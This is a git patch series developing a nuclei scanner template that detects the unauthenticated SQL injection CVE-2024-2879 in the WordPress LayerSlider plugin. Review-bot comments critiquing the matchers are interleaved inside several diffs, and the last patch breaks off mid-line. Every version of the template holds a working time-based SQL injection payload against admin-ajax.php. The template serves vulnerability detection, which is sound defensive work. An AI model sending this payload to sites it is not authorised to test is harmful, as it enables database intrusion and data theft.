From e0ed53f48b5182f5a35313d307b5b075761d8794 Mon Sep 17 00:00:00 2001
From: Daly Whyte
Date: Fri, 5 Apr 2024 12:06:40 +0100
Subject: [PATCH 1/8] Create CVE-2024-2879.yaml

Added template for CVE-2024-2789
---
 http/cves/2024/CVE-2024-2879.yaml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-2879.yaml

diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml
new file mode 100644
index 0000000000..1dbc8dacab
--- /dev/null
+++ b/http/cves/2024/CVE-2024-2879.yaml
@@ -0,0 +1,28 @@
+id: CVE-2024-2879
+info:
+ name: WordPress Plugin LayerSlider 7.9.11 – 7.10.0 – Unauthenticated SQL Injection (CVE-2024-2879)
+ author: Security Blue Team
+ severity: critical
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-2879
+ - https://www.securityblue.team/blog/posts/Critical-Vulnerability-in-WordPress-Plugin-LayerSlider
+ - https://www.wordfence.com/blog/2024/04/5500-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-layerslider-wordpress-plugin/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-2879
+ cwe-id: CWE-89
+ tags: wordpress,layerslider,sqli,CVE-2024-2879
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x)'
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>= 5'
+ - type: status
+ status:
+ - 200
From 72edb06c1ccca87168de91ac66150203e72f9e1b Mon Sep 17 00:00:00 2001
From: d4ly <53091736+d4lyw@users.noreply.github.com>
Date: Fri, 5 Apr 2024 12:46:52 +0100
Subject: [PATCH 2/8] Update CVE-2024-2879.yaml

Fixed lint.
---
 http/cves/2024/CVE-2024-2879.yaml | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml
index 1dbc8dacab..65f71e1df7 100644
--- a/http/cves/2024/CVE-2024-2879.yaml
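Review bot: The two matchers under `matchers:` in the new file carry no `matchers-condition`, and nuclei's default for that key is `or`, so the `status` matcher alone — any 200 from admin-ajax.php, which a valid action on a patched install likely also returns — reports a hit without the 5-second delay ever being observed, a large false-positive surface for a timing-based SQLi check. Add `matchers-condition: and` directly under `matchers:` or fold the status check into the dsl matcher. PATCH 3/8 restores the same two-matcher block and shares the gap; PATCH 4/8 later resolves it by moving both checks into one dsl matcher with `condition: and`. The `requests:` key is also the legacy name for the block, which PATCH 4/8 renames to `http:`.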
+++ b/http/cves/2024/CVE-2024-2879.yaml
@@ -22,7 +22,5 @@ requests:
 matchers:
 - type: dsl
 dsl:
- - 'duration>= 5'
- - type: status
- status:
- - 200
+ - 'duration>= 5'
+
From 9b663bd06c7acb7cf26486e724238119a1918a64 Mon Sep 17 00:00:00 2001
From: d4ly <53091736+d4lyw@users.noreply.github.com>
Date: Fri, 5 Apr 2024 12:51:46 +0100
Subject: [PATCH 3/8] Update CVE-2024-2879.yaml

Accidentally removed status check.
---
 http/cves/2024/CVE-2024-2879.yaml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml
index 65f71e1df7..aa54110593 100644
--- a/http/cves/2024/CVE-2024-2879.yaml
+++ b/http/cves/2024/CVE-2024-2879.yaml
@@ -23,4 +23,6 @@ requests:
 - type: dsl
 dsl:
 - 'duration>= 5'
-
+ - type: status
+ status:
+ - 200
From 2835ad4955dad90bcda11a3f41b729331a49d3a2 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 5 Apr 2024 17:45:57 +0530
Subject: [PATCH 4/8] minor update

---
 http/cves/2024/CVE-2024-2879.yaml | 29 +++++++++++++++++++++--------
 1 file changed, 21 insertions(+), 8 deletions(-)

diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml
index aa54110593..44d6fff424 100644
--- a/http/cves/2024/CVE-2024-2879.yaml
+++ b/http/cves/2024/CVE-2024-2879.yaml
@@ -1,20 +1,33 @@
 id: CVE-2024-2879
+
 info:
- name: WordPress Plugin LayerSlider 7.9.11 – 7.10.0 – Unauthenticated SQL Injection (CVE-2024-2879)
- author: Security Blue Team
+ name: WordPress Plugin LayerSlider 7.9.11-7.10.0 – Unauthenticated SQL Injection
+ author: d4lyw
 severity: critical
+ description: |
+ The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append
+ additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ remediation: Fixed in 7.10.1
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2024-2879
 - https://www.securityblue.team/blog/posts/Critical-Vulnerability-in-WordPress-Plugin-LayerSlider
 - https://www.wordfence.com/blog/2024/04/5500-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-layerslider-wordpress-plugin/
+ - https://layerslider.com/release-log/
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3fddf96e-029c-4753-ba82-043ca64b78d3?source=cve
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
 cve-id: CVE-2024-2879
 cwe-id: CWE-89
- tags: wordpress,layerslider,sqli,CVE-2024-2879
+ epss-score: 0.00043
+ epss-percentile: 0.07687
+ metadata:
+ verified: true
+ max-request: 1
+ publicwww-query: "/wp-content/plugins/LayerSlider/"
+ tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli
 
-requests:
+http:
 - method: GET
 path:
 - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x)'
@@ -22,7 +35,7 @@ requests:
 matchers:
 - type: dsl
 dsl:
- - 'duration>= 5'
- - type: status
- status:
- - 200
+ - duration>=5
+ - status_code == 200
+ - contains(body, "")
+ condition: and
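Review bot: In the second hunk (`@@ -22,7 +35,7 @@`), `contains(body, "")` is vacuously true — every body contains the empty string — so it contributes nothing to the `condition: and` and reads as a placeholder that was never filled in. Either drop that line or replace it with a response marker verified against a vulnerable build, e.g. `- contains(body, "<marker verified on vulnerable build>")`; PATCH 7/8 in this series rewrites that line, but its new value is cut off in this view. With that line inert, the injection signal rests on `duration>=5` alone, and a slow or rate-limited host can exceed 5 s without being vulnerable, so consider comparing the delayed request's duration against a baseline request rather than relying on an absolute threshold.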
From 76db6c72d8d48e723456f6b0ac9c189971a65e95 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 5 Apr 2024 17:48:25 +0530
Subject: [PATCH 5/8] more capatible version

---
 http/cves/2024/CVE-2024-2879.yaml | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml
index 44d6fff424..8fac8076a8 100644
--- a/http/cves/2024/CVE-2024-2879.yaml
+++ b/http/cves/2024/CVE-2024-2879.yaml
@@ -28,9 +28,11 @@ info:
 tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli

 http:
- - method: GET
- path:
- - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x)'
+ - raw:
+ - |
+ @timeout: 10s
+ GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x) HTTP/1.1'
+ Host: {{Hostname}}

 matchers:
 - type: dsl
From f0a62df007e994d7997b14edbd8961c2abdb8a1c Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 5 Apr 2024 17:51:17 +0530
Subject: [PATCH 6/8] fix trailspace

---
 http/cves/2024/CVE-2024-2879.yaml | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml
index 8fac8076a8..b18e7dabdf 100644
--- a/http/cves/2024/CVE-2024-2879.yaml
+++ b/http/cves/2024/CVE-2024-2879.yaml
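Review bot: The request line in the new `raw:` block ends with a stray `'` after `HTTP/1.1`, so the version token sent on the wire is `HTTP/1.1'`; a strict server or intermediate proxy may reject that with a 400 before the injected query executes, and the `duration>=5` matcher would then miss a vulnerable host. Drop the trailing quote so the line ends in ` HTTP/1.1`. PATCH 7/8 on this page replaces the raw block with a `path:`-based request, which removes the problem, but this intermediate commit as written sends a malformed request.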
@@ -5,8 +5,7 @@ info:
 author: d4lyw
 severity: critical
 description: |
- The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append
- additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
 remediation: Fixed in 7.10.1
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2024-2879
From 013dfff19e53b5a3cf10c5fdd978dd9a062c70c0 Mon Sep 17 00:00:00 2001
From: d4ly <53091736+d4lyw@users.noreply.github.com>
Date: Fri, 5 Apr 2024 16:11:53 +0100
Subject: [PATCH 7/8] Update CVE-2024-2879.yaml

Re-wrote with flow and additional pre-check on http(1), unfortunately no simple README.txt, at least in my environment.
---
 http/cves/2024/CVE-2024-2879.yaml | 23 +++++++++++++++--------
 1 file changed, 15 insertions(+), 8 deletions(-)

diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml
index b18e7dabdf..64b7c5be47 100644
--- a/http/cves/2024/CVE-2024-2879.yaml
+++ b/http/cves/2024/CVE-2024-2879.yaml
@@ -2,7 +2,7 @@ id: CVE-2024-2879

 info:
 name: WordPress Plugin LayerSlider 7.9.11-7.10.0 – Unauthenticated SQL Injection
- author: d4lyw
+ author: d4ly
 severity: critical
 description: |
 The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
@@ -26,17 +26,24 @@ info:
 publicwww-query: "/wp-content/plugins/LayerSlider/"
 tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli
 
-http:
- - raw:
- - |
- @timeout: 10s
- GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x) HTTP/1.1'
- Host: {{Hostname}}
+flow: http(1) && http(2)
 
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css"
+ matchers:
+ - type: word
+ words:
+ - ".ls-clearfix:before"
+ internal: true
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x)"
 matchers:
 - type: dsl
 dsl:
 - duration>=5
 - status_code == 200
- - contains(body, "")
+ - contains(body, "